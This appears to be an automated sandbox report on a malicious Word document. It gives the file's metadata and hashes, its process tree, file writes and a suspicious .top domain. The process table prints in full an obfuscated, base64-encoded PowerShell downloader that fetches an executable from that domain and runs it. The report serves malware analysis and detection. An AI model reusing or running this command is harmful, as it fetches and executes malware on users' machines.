File name: | info_04.22.doc |
Full analysis: | https://app.any.run/tasks/c6004a23-4b05-4771-9d1e-60d2adb418e7 |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 04:06:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: 41o3aj2d86l3f2my816cbf, Subject: b7mmf648zf9ykeons9zmekwyn6vide7, Author: bvq4gijg5b9, Comments: z6n5x7whe7vygdbuunocl, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Mon Apr 22 10:45:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | 34C865E85DE90C91D9896B8F3707C542 |
SHA1: | 131FBD6C6ED2B6A14FFA2348F841FED668DC8AFA |
SHA256: | 4D79F366C43B6E14E05C3815AC6815445C6CC78744906CE06214CE8078E5761F |
SSDEEP: | 1536:9OuJcjk5zu31wQmBV3ePUxQy2oDG3dbVurlqD3FIlCj0ug4u8s:y45a1MVOJplbFVIlC4ug/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | 41o3aj2d86l3f2my816cbf |
---|---|
Subject: | b7mmf648zf9ykeons9zmekwyn6vide7 |
Author: | bvq4gijg5b9 |
Keywords: | - |
Comments: | z6n5x7whe7vygdbuunocl |
Template: | Normal |
LastModifiedBy: | Пользователь Windows |
RevisionNumber: | 11 |
Software: | Microsoft Office Word |
TotalEditTime: | 3.0 minutes |
CreateDate: | 2018:04:19 18:59:00 |
ModifyDate: | 2019:04:22 09:45:00 |
Pages: | 1 |
Words: | 1 |
Characters: | 7 |
Security: | None |
CodePage: | Windows Cyrillic |
Manager: | z4j6gvu98n6scaq2dy2cx3z4vt |
Company: | 01ky8jlv5vho9n1s0umrhhy8sk4by |
Bytes: | 23552 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 7 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3876 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_04.22.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2908 | "C:\Windows\System32\cmd.exe" /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsAIAAgAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwB6AGMAYQByAG0AZQBuAC4AdABvAHAALwBzAGsAbwBlAHgALwBwAG8AMgAuAHAAaABwAD8AbAA9AHEAdQBpAG4AdAB5ADEALgBmAGcAcwAiACkADQAKACAAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApADsADQAKAA0ACgAgACAAIAAgACAAJABwAGEAdABoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACIAQwBvAG0AbQBvAG4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAEQAYQB0AGEAIgApACAAKwAgACIAXABcAEQAVABwAEcATAAuAGUAeABlACIAOwANAAoAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgALAAgACQAcgBlAHMAcABvAG4AcwBlACkAOwANAAoADQAKACAAIAAgACAAIAAkAGMAbABzAGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARwB1AGkAZAAgACcAQwAwADgAQQBGAEQAOQAwAC0ARgAyAEEAMQAtADEAMQBEADEALQA4ADQANQA1AC0AMAAwAEEAMABDADkAMQBGADMAOAA4ADAAJwANAAoAIAAgACAAIAAgACQAdAB5AHAAZQAgAD0AIABbAFQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAEMATABTAEkARAAoACQAYwBsAHMAaQBkACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0ACAAPQAgAFsAQQBjAHQAaQB2AGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJAB0AHkAcABlACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0AC4ARABvAGMAdQBtAGUAbgB0AC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAkAHAAYQB0AGgALAAkAG4AdQBsACwAIAAkAG4AdQBsACwAIAAkAG4AdQBsACwAMAApAA0ACgANAAoAIAAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQANAAoAIAAgACAAIAAgAA0ACgAgACAAfQANAAoADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1936 | POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsAIAAgAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwB6AGMAYQByAG0AZQBuAC4AdABvAHAALwBzAGsAbwBlAHgALwBwAG8AMgAuAHAAaABwAD8AbAA9AHEAdQBpAG4AdAB5ADEALgBmAGcAcwAiACkADQAKACAAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApADsADQAKAA0ACgAgACAAIAAgACAAJABwAGEAdABoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACIAQwBvAG0AbQBvAG4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAEQAYQB0AGEAIgApACAAKwAgACIAXABcAEQAVABwAEcATAAuAGUAeABlACIAOwANAAoAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgALAAgACQAcgBlAHMAcABvAG4AcwBlACkAOwANAAoADQAKACAAIAAgACAAIAAkAGMAbABzAGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARwB1AGkAZAAgACcAQwAwADgAQQBGAEQAOQAwAC0ARgAyAEEAMQAtADEAMQBEADEALQA4ADQANQA1AC0AMAAwAEEAMABDADkAMQBGADMAOAA4ADAAJwANAAoAIAAgACAAIAAgACQAdAB5AHAAZQAgAD0AIABbAFQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAEMATABTAEkARAAoACQAYwBsAHMAaQBkACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0ACAAPQAgAFsAQQBjAHQAaQB2AGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJAB0AHkAcABlACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0AC4ARABvAGMAdQBtAGUAbgB0AC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAkAHAAYQB0AGgALAAkAG4AdQBsACwAIAAkAG4AdQBsACwAIAAkAG4AdQBsACwAMAApAA0ACgANAAoAIAAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQANAAoAIAAgACAAIAAgAA0ACgAgACAAfQANAAoADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2D66.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1936 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\111EWOXS0YN80U68NZWT.temp | — | |
MD5:— | SHA256:— | |||
3876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$fo_04.22.doc | pgc | |
MD5:973A155DD0120397E8412609335FEC3E | SHA256:05146D7181CBB459BDD73356679231702801F834134AB30111BCD46E5F29DDE4 | |||
1936 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF113630.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1936 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3876 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9AA328F831C50DD9BBEFE2D9BC2194AD | SHA256:965B6A8A909D7CFA9EB1790958BDCACB88B5258F8EB535D32891D882224E44E2 |
Domain | IP | Reputation |
---|---|---|
zcarmen.top |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |